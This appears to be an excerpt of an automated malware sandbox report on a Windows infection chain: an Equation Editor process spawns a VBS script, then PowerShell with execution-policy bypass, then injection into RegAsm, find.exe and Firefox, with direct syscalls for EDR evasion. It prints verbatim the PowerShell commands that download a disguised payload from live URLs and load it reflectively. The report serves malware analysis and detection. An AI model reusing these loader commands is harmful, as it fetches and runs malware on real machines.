            Source: C:\Windows\SysWOW64\find.exeFile Volume queried: C:\Users\user\AppData\Local FullSizeInformationJump to behavior
            Source: C:\Windows\SysWOW64\find.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformationJump to behavior
            Source: C:\Windows\SysWOW64\find.exeCode function: 13_2_61E1825F sqlite3_os_init,GetSystemInfo,sqlite3_vfs_register,sqlite3_vfs_register,sqlite3_vfs_register,sqlite3_vfs_register,13_2_61E1825F
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_02300101 rdtsc 11_2_02300101
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022B07AC NtCreateMutant,LdrInitializeThunk,11_2_022B07AC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022A0080 mov ecx, dword ptr fs:[00000030h]11_2_022A0080
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022A00EA mov eax, dword ptr fs:[00000030h]11_2_022A00EA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022C26F8 mov eax, dword ptr fs:[00000030h]11_2_022C26F8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Yara detected Powershell download and execute
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3148, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3248, type: MEMORYSTR
            Bypasses PowerShell execution policy
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtQueryInformationProcess: Direct from: 0x774CFAFAJump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtCreateUserProcess: Direct from: 0x774D093EJump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtCreateKey: Direct from: 0x774CFB62Jump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtQuerySystemInformation: Direct from: 0x774D20DEJump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtQueryDirectoryFile: Direct from: 0x774CFDBAJump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtClose: Direct from: 0x774CFA02
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtWriteVirtualMemory: Direct from: 0x774D213EJump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtCreateFile: Direct from: 0x774D00D6Jump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtSetTimer: Direct from: 0x774D021AJump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtOpenFile: Direct from: 0x774CFD86Jump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtSetInformationThread: Direct from: 0x774E9893Jump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtOpenKeyEx: Direct from: 0x774CFA4AJump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtAllocateVirtualMemory: Direct from: 0x774CFAE2Jump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtResumeThread: Direct from: 0x774D008DJump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtOpenKeyEx: Direct from: 0x774D103AJump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtUnmapViewOfSection: Direct from: 0x774CFCA2Jump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtDelayExecution: Direct from: 0x774CFDA1Jump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtSetInformationProcess: Direct from: 0x774CFB4AJump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtSetInformationThread: Direct from: 0x774CF9CEJump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtReadFile: Direct from: 0x774CF915Jump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtMapViewOfSection: Direct from: 0x774CFC72Jump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtCreateThreadEx: Direct from: 0x774D08C6Jump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtDeviceIoControlFile: Direct from: 0x774CF931Jump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtRequestWaitReplyPort: Direct from: 0x753C6BCEJump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtQueryValueKey: Direct from: 0x774CFACAJump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtOpenSection: Direct from: 0x774CFDEAJump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtProtectVirtualMemory: Direct from: 0x774D005AJump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtWriteVirtualMemory: Direct from: 0x774CFE36Jump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtRequestWaitReplyPort: Direct from: 0x756F8D92Jump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtQueryVolumeInformationFile: Direct from: 0x774CFFAEJump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtNotifyChangeKey: Direct from: 0x774D0F92Jump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtQueryAttributesFile: Direct from: 0x774CFE7EJump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtReadVirtualMemory: Direct from: 0x774CFEB2Jump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtSetTimer: Direct from: 0x774E98D5Jump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtSetInformationFile: Direct from: 0x774CFC5AJump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtQuerySystemInformation: Direct from: 0x774CFDD2Jump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeSection loaded: NULL target: C:\Windows\SysWOW64\find.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: NULL target: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: NULL target: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\find.exeThread APC queued: target process: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008Jump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\mekissedbutterburnwithstrong.vBS" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GRW/341/33.051.012.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeProcess created: C:\Windows\SysWOW64\find.exe "C:\Windows\SysWOW64\find.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jwbo? ? ? ? ?hq? ? ? ? ?d? ? ? ? ?bw? ? ? ? ?hm? ? ? ? ?og? ? ? ? ?v? ? ? ? ?c8? ? ? ? ?aqbh? ? ? ? ?dg? ? ? ? ?m? ? ? ? ?? ? ? ? ?z? ? ? ? ?de? ? ? ? ?m? ? ? ? ?? ? ? ? ?0? ? ? ? ?c4? ? ? ? ?dqbz? ? ? ? ?c4? ? ? ? ?yqby? ? ? ? ?gm? ? ? ? ?a? ? ? ? ?bp? ? ? ? ?hy? ? ? ? ?zq? ? ? ? ?u? ? ? ? ?g8? ? ? ? ?cgbn? ? ? ? ?c8? ? ? ? ?mg? ? ? ? ?3? ? ? ? ?c8? ? ? ? ?aqb0? ? ? ? ?gu? ? ? ? ?bqbz? ? ? ? ?c8? ? ? ? ?dgbi? ? ? ? ?hm? ? ? ? ?xw? ? ? ? ?y? ? ? ? ?d? ? ? ? ?? ? ? ? ?mg? ? ? ? ?0? ? ? ? ?d? ? ? ? ?? ? ? ? ?nw? ? ? ? ?y? ? ? ? ?dy? ? ? ? ?xw? ? ? ? ?y? ? ? ? ?d? ? ? ? ?? ? ? ? ?mg? ? ? ? ?0? ? ? ? ?d? ? ? ? ?? ? ? ? ?nw? ? ? ? ?y? ? ? ? ?dy? ? ? ? ?lwb2? ? ? ? ?gi? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?go? ? ? ? ?c? ? ? ? ?bn? ? ? ? ?cc? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?hc? ? ? ? ?zqbi? ? ? ? ?em? ? ? ? ?b? ? ? ? ?bp? ? ? ? ?gu? ? ? ? ?bgb0? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?e4? ? ? ? ?zqb3? ? ? ? ?c0? ? ? ? ?twbi? ? ? ? ?go? ? ? ? ?zqbj? ? ? ? ?hq? ? ? ? ?i? ? ? ? ?bt? ? ? ? ?hk? ? ? 